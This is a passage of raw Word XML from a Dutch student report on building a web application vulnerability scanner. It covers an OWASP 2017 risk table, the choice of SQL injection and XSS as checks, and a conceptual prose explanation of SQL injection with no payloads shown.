            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1788" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CED5DE1" w14:textId="2D48D79C" w:rsidR="001A6DC7" w:rsidRDefault="00A51EA9">
            <w:r>
              <w:t>Moeilijk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245746" w14:paraId="3E636056" w14:textId="77777777" w:rsidTr="007118F2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="704" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F5A1E29" w14:textId="09D6B70E" w:rsidR="00245746" w:rsidRDefault="00245746">
            <w:r>
              <w:t>A8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2034" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F43FE23" w14:textId="1E7170CA" w:rsidR="00245746" w:rsidRDefault="00A51EA9">
            <w:r>
              <w:t>Vaak</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1644" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E794621" w14:textId="215FFB7D" w:rsidR="00245746" w:rsidRDefault="00081392">
            <w:r>
              <w:t>Makkelijk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1451" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D84296B" w14:textId="66C0B733" w:rsidR="00245746" w:rsidRDefault="00A51EA9">
            <w:r>
              <w:t>Gemiddeld</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3235C803" w14:textId="251E5249" w:rsidR="00245746" w:rsidRDefault="00BC4CD0">
            <w:r>
              <w:t>Hoog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1788" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5446E245" w14:textId="093FEB90" w:rsidR="00245746" w:rsidRDefault="00A51EA9">
            <w:r>
              <w:t>Makkelijk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245746" w14:paraId="395A3262" w14:textId="77777777" w:rsidTr="00245746">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="704" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F35F159" w14:textId="7437B691" w:rsidR="00245746" w:rsidRDefault="00245746">
            <w:r>
              <w:t>A9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6378BF1E" w14:textId="138FA9CC" w:rsidR="00245746" w:rsidRDefault="00A51EA9">
            <w:r>
              <w:t>Niet Vaak</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A48CF4C" w14:textId="2B8E10DE" w:rsidR="00245746" w:rsidRDefault="00A51EA9">
            <w:r>
              <w:t>Gemiddeld</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1451" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46455194" w14:textId="15366D52" w:rsidR="00245746" w:rsidRDefault="00A51EA9">
            <w:r>
              <w:t>Gemiddeld</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C5772BB" w14:textId="1BDDFCD0" w:rsidR="00245746" w:rsidRDefault="00A51EA9">
            <w:r>
              <w:t>Gemiddeld</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1788" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71D95336" w14:textId="3AAC4884" w:rsidR="00245746" w:rsidRDefault="00A51EA9">
            <w:r>
              <w:t>Moeilijk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00232C33" w14:paraId="22525B93" w14:textId="77777777" w:rsidTr="00245746">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="704" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="383D4428" w14:textId="0E493CBA" w:rsidR="00232C33" w:rsidRDefault="00232C33" w:rsidP="00232C33">
            <w:r>
              <w:t>A10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="216C8A46" w14:textId="55FFAC39" w:rsidR="00232C33" w:rsidRDefault="00232C33" w:rsidP="00232C33">
            <w:r>
              <w:t>Niet Vaak</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C016DCE" w14:textId="14976159" w:rsidR="00232C33" w:rsidRDefault="00232C33" w:rsidP="00232C33">
            <w:r>
              <w:t>Gemiddeld</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1451" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DDE5187" w14:textId="0E7E61EF" w:rsidR="00232C33" w:rsidRDefault="00232C33" w:rsidP="00232C33">
            <w:r>
              <w:t>Gemiddeld</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14EA6BC8" w14:textId="217FD60F" w:rsidR="00232C33" w:rsidRDefault="00232C33" w:rsidP="00232C33">
            <w:r>
              <w:t>Gemiddeld</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1788" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="003592EE" w14:textId="4043B4D2" w:rsidR="00232C33" w:rsidRDefault="00232C33" w:rsidP="00232C33">
            <w:r>
              <w:t>Moeilijk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="42C01BD0" w14:textId="3CAA77C1" w:rsidR="00A94B1E" w:rsidRDefault="002F0F65">
      <w:r>
        <w:t xml:space="preserve">Tabel 3.3 </w:t>
      </w:r>
      <w:r w:rsidR="00A94B1E">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A94B1E">
        <w:t>OWASP detail</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A94B1E">
        <w:t xml:space="preserve"> pagina’s van risico’s, 2017)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E224A1" w14:textId="77777777" w:rsidR="0079562A" w:rsidRDefault="0079562A"/>
    <w:p w14:paraId="7C18449D" w14:textId="70946FCD" w:rsidR="00447F98" w:rsidRDefault="002777CC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In tabel 3.3 kun je </w:t>
      </w:r>
      <w:r w:rsidR="00BC4CD0">
        <w:t xml:space="preserve">aan </w:t>
      </w:r>
      <w:r>
        <w:t>de blauw gekleurde</w:t>
      </w:r>
      <w:r w:rsidR="00BC4CD0">
        <w:t xml:space="preserve"> regels zien welke risico’s ik heb gekozen om te implementeren in de </w:t>
      </w:r>
      <w:r w:rsidR="008272A8">
        <w:t>Webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="00BC4CD0">
        <w:t xml:space="preserve"> scanner. Dit heb ik </w:t>
      </w:r>
      <w:r w:rsidR="005872AE">
        <w:t xml:space="preserve">gedaan </w:t>
      </w:r>
      <w:r w:rsidR="00BC4CD0">
        <w:t>op basis van hoe vaak het risico voor</w:t>
      </w:r>
      <w:r w:rsidR="005872AE">
        <w:t xml:space="preserve">komt, en </w:t>
      </w:r>
      <w:r w:rsidR="00BC4CD0">
        <w:t xml:space="preserve">kijkend naar de moeilijkheidsgraad </w:t>
      </w:r>
      <w:r w:rsidR="005872AE">
        <w:t xml:space="preserve">van de implementatie ervan, en ook op basis van de tijd die ik heb gekregen voor dit project. </w:t>
      </w:r>
      <w:r w:rsidR="0031090B">
        <w:t>Mijn se</w:t>
      </w:r>
      <w:r w:rsidR="00597F47">
        <w:t>lectie bestaat uit A1 injecties en</w:t>
      </w:r>
      <w:r w:rsidR="0031090B">
        <w:t xml:space="preserve"> A3 XSS. </w:t>
      </w:r>
      <w:r w:rsidR="003B6D36">
        <w:t xml:space="preserve"> Deze zijn Vaak tot Heel Vaak voorkomend en zijn makkelijk tot gemiddeld implementeerbaar in het systeem. </w:t>
      </w:r>
      <w:r w:rsidR="006246AA">
        <w:t xml:space="preserve">Wat ik ook heb opgemerkt is dat wanneer een Risico oftewel kwetsbaarheid makkelijk exploiteerbaar is, is de </w:t>
      </w:r>
      <w:r w:rsidR="00847276">
        <w:t xml:space="preserve">implementatie van het identificeren ervan ook makkelijk. </w:t>
      </w:r>
      <w:r w:rsidR="00973012">
        <w:t xml:space="preserve">Hier is een simpele reden voor, een </w:t>
      </w:r>
      <w:r w:rsidR="00733C80">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="00973012">
        <w:t xml:space="preserve"> scanner doet een poging om de kwetsbaarheid te exploitere</w:t>
      </w:r>
      <w:r w:rsidR="00F83B53">
        <w:t xml:space="preserve">n door een aanval te simuleren. Dit wordt in de meeste gevallen in een veilige test omgeving gedaan. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAAD6E4" w14:textId="0FF6E5A0" w:rsidR="00D96689" w:rsidRPr="00D173C6" w:rsidRDefault="006A33B8" w:rsidP="006A33B8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc491022061"/>
      <w:r>
        <w:t>3.2.2</w:t>
      </w:r>
      <w:r w:rsidR="00FE6C9B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E848BF">
        <w:t xml:space="preserve">OWASP </w:t>
      </w:r>
      <w:r w:rsidR="00D173C6" w:rsidRPr="00D173C6">
        <w:t>Selectie</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="44031CB4" w14:textId="08501895" w:rsidR="00E12430" w:rsidRPr="008C7B6A" w:rsidRDefault="007A55BC">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C7B6A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">A1 </w:t>
      </w:r>
      <w:r w:rsidR="00F65ACF" w:rsidRPr="008C7B6A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>injectie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CBB771" w14:textId="79397B57" w:rsidR="004C2466" w:rsidRDefault="004C2466">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Software ontwikkelaars</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> gebruiken SQL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>queries</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> om een actie uit te voeren op de database, deze </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>queries</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> hebben in sommige g</w:t>
      </w:r>
      <w:r w:rsidR="00757CBC">
        <w:t>evallen input nodig van de eind</w:t>
      </w:r>
      <w:r>
        <w:t>gebruiker, zoals bij een inlog formulier. De gebruiker voorziet de SQL Query met de benodigde argumenten, zoals de gebruikersnaam en wachtwoord. De applicatie bouwt met deze argumenten de query op en laat het uitvoeren door de database.</w:t>
      </w:r>
      <w:r w:rsidR="00F2706B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D58DB">
        <w:t>In figuur 3.1 staat een voorbeeld van een veel gebruikte select query voor het authentiseren van gebruiker. De globale $_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004D58DB">
        <w:t>POST[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004D58DB">
        <w:t xml:space="preserve">] variabelen zijn de argumenten die </w:t>
      </w:r>
      <w:r w:rsidR="00444996">
        <w:t>de eindgebruiker meegeeft als input aan de applicatie</w:t>
      </w:r>
      <w:r w:rsidR="004D58DB">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311436B8" w14:textId="719B2D3B" w:rsidR="009464BA" w:rsidRDefault="00643058" w:rsidP="009464BA">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69231F66" wp14:editId="6437D78B">
            <wp:extent cx="5760720" cy="358140"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="455" name="Afbeelding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electquery.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58140"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A9A74A" w14:textId="53C4A85D" w:rsidR="004C2466" w:rsidRPr="00C66F67" w:rsidRDefault="009464BA" w:rsidP="009464BA">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t>Figuur 3.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9799BF" w14:textId="37F953DE" w:rsidR="00FB6171" w:rsidRDefault="00F664C7">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251723776" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="16E360BA" wp14:editId="5EC9990A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>412115</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3285490</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4851400" cy="168910"/>
                <wp:effectExtent l="0" t="0" r="6350" b="2540"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="454" name="Tekstvak 454"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4851400" cy="168910"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="1E47D233" w14:textId="3A137D16" w:rsidR="00CE4BB5" w:rsidRPr="003808D6" w:rsidRDefault="00CE4BB5" w:rsidP="00F664C7">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Figuur 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E360BA" id="Tekstvak 454" o:spid="_x0000_s1041" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:32.45pt;margin-top:258.7pt;width:382pt;height:13.3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9jNTcCAABrBAAADgAAAGRycy9lMm9Eb2MueG1srFRRb9sgEH6ftP+AeF8cV2mVRXGqLFWmSVFb&#10;Kan6TDDEqMAxILGzX78Dx+3W7WnaCz7ujoPv++48v+2MJifhgwJb0XI0pkRYDrWyh4o+7dafppSE&#10;yGzNNFhR0bMI9Hbx8cO8dTNxBQ3oWniCRWyYta6iTYxuVhSBN8KwMAInLAYleMMibv2hqD1rsbrR&#10;xdV4fFO04GvngYsQ0HvXB+ki15dS8PggZRCR6Iri22JefV73aS0WczY7eOYaxS/PYP/wCsOUxUtf&#10;S92xyMjRqz9KGcU9BJBxxMEUIKXiImNANOX4HZptw5zIWJCc4F5pCv+vLL8/PXqi6opOrieUWGZQ&#10;pJ14CfHEXkjyIUOtCzNM3DpMjd0X6FDpwR/QmYB30pv0RUgE48j1+ZVf0UXC0TmZXpeTMYY4xsqb&#10;6ecyC1C8nXY+xK8CDElGRT3ql2llp02I+BJMHVLSZQG0qtdK67RJgZX25MRQ67ZRUaQ34onfsrRN&#10;uRbSqT6cPEWC2ENJVuz2XSZlOsDcQ31G9B76DgqOrxXet2EhPjKPLYOocAziAy5SQ1tRuFiUNOB/&#10;/M2f8lFJjFLSYgtWNHw/Mi8o0d8sapz6dTD8YOwHwx7NChBpiQPmeDbxgI96MKUH84zTsUy3YIhZ&#10;jndVNA7mKvaDgNPFxXKZk7ArHYsbu3U8lR543XXPzLuLKhH1vIehOdnsnTh9bs/y8hhBqqxc4rVn&#10;8UI3dnSW5zJ9aWR+3eest3/E4icAAAD//wMAUEsDBBQABgAIAAAAIQAUeQeb3wAAAAoBAAAPAAAA&#10;ZHJzL2Rvd25yZXYueG1sTI9NT8MwDIbvSPyHyEhcEEtXldGVphNscBuHfWhnrwltReNUTbp2/x5z&#10;gqNfv3r8OF9NthUX0/vGkYL5LAJhqHS6oUrB8fDxmILwAUlj68gouBoPq+L2JsdMu5F25rIPlWAI&#10;+QwV1CF0mZS+rI1FP3OdId59ud5i4LGvpO5xZLhtZRxFC2mxIb5QY2fWtSm/94NVsNj0w7ij9cPm&#10;+L7Fz66KT2/Xk1L3d9PrC4hgpvBXhl99VoeCnc5uIO1Fy4xkyU0FT/PnBAQX0jjl5MxJkkQgi1z+&#10;f6H4AQAA//8DAFBLAQItABQABgAIAAAAIQDkmcPA+wAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABb&#10;Q29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhACOyauHXAAAAlAEAAAsAAAAAAAAAAAAA&#10;AAAALAEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAFLvYzU3AgAAawQAAA4AAAAAAAAAAAAA&#10;AAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhABR5B5vfAAAACgEAAA8AAAAAAAAA&#10;AAAAAAAAjwQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAACbBQAAAAA=&#10;" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="1E47D233" w14:textId="3A137D16" w:rsidR="00CE4BB5" w:rsidRPr="003808D6" w:rsidRDefault="00CE4BB5" w:rsidP="00F664C7">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figuur 3.2</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251721728" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="70D2EB22" wp14:editId="76D54123">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>414867</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1152313</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4851400" cy="2079171"/>
            <wp:effectExtent l="0" t="0" r="635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ql diagram.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4851400" cy="2079171"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00953B30" w:rsidRPr="00811D86">
        <w:t>SQL injectie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00953B30" w:rsidRPr="00811D86">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00953B30" w:rsidRPr="00811D86">
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00953B30" w:rsidRPr="00811D86">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00811D86" w:rsidRPr="00811D86">
        <w:t xml:space="preserve">is een applicatie </w:t>
      </w:r>
      <w:r w:rsidR="00F41E56">
        <w:t>security kwetsbaarheid dat ervoor zorgt dat cybercriminelen controle krijg</w:t>
      </w:r>
      <w:r w:rsidR="006222AE">
        <w:t>en over de database</w:t>
      </w:r>
      <w:r w:rsidR="00C66F67">
        <w:t xml:space="preserve"> van de applicatie</w:t>
      </w:r>
      <w:r w:rsidR="006222AE">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="001763D4">
        <w:t xml:space="preserve">De cybercrimineel kan toegang krijgen tot of het </w:t>
      </w:r>
      <w:r w:rsidR="00276EB1">
        <w:t xml:space="preserve">veranderen en </w:t>
      </w:r>
      <w:r w:rsidR="001763D4">
        <w:t xml:space="preserve">verwijderen </w:t>
      </w:r>
      <w:r w:rsidR="00276EB1">
        <w:t xml:space="preserve">van data. </w:t>
      </w:r>
      <w:r w:rsidR="00E211A3">
        <w:t xml:space="preserve">Dit gebeurt wanneer de applicatie onverwachte </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00E211A3">
        <w:t>SQL commando’s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E211A3">
        <w:t xml:space="preserve"> opstuurt </w:t>
      </w:r>
      <w:r w:rsidR="00EE1080">
        <w:t xml:space="preserve">naar de server. </w:t>
      </w:r>
      <w:r w:rsidR="004C256F">
        <w:t xml:space="preserve">De </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004C256F">
        <w:t>SQL injectie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004C256F">
        <w:t xml:space="preserve"> worden in de meeste gevallen via een web for</w:t>
      </w:r>
      <w:r w:rsidR="00A90DDF">
        <w:t>mulier o</w:t>
      </w:r>
      <w:r w:rsidR="00C92265">
        <w:t xml:space="preserve">f browserbalk ingevoerd als </w:t>
      </w:r>
      <w:r w:rsidR="00A90DDF">
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidR="00C92265">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004C256F">
        <w:t>en</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004C256F">
        <w:t xml:space="preserve"> als de server er niet in sla</w:t>
      </w:r>
      <w:r w:rsidR="00122280">
        <w:t>agt om het op de juiste wijze schoon te maken (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00122280">
        <w:t>sanitize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00122280">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00A90DDF">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A90DDF">
        <w:t>voor dat het de data</w:t>
      </w:r>
      <w:r w:rsidR="000248A6">
        <w:t xml:space="preserve"> to</w:t>
      </w:r>
      <w:r w:rsidR="00960878">
        <w:t>egevoegd wordt aan de SQL Query</w:t>
      </w:r>
      <w:r w:rsidR="00FA1C97">
        <w:t xml:space="preserve"> dan kan de aanvaller zijn eigen SQL commando</w:t>
      </w:r>
      <w:r w:rsidR="00A17141">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00FA1C97">
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r w:rsidR="00A17141">
        <w:t>eraan voegen wat de d</w:t>
      </w:r>
      <w:r w:rsidR="00FB6171">
        <w:t>atabase zal uitvoeren.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D215CF6" w14:textId="08086BF6" w:rsidR="00FB6171" w:rsidRPr="00811D86" w:rsidRDefault="00FD4FA5" w:rsidP="00F664C7">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r w:rsidRPr="00114E69">
        <w:rPr>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251718656" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1DC3EB0B" wp14:editId="3F4FA9EA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>228812</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2344420</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1930400" cy="956310"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="44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956310"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:noFill/>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="3C10F22F" w14:textId="39719AA2" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00271A19">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">Met </w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:t>SQL taal</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r>
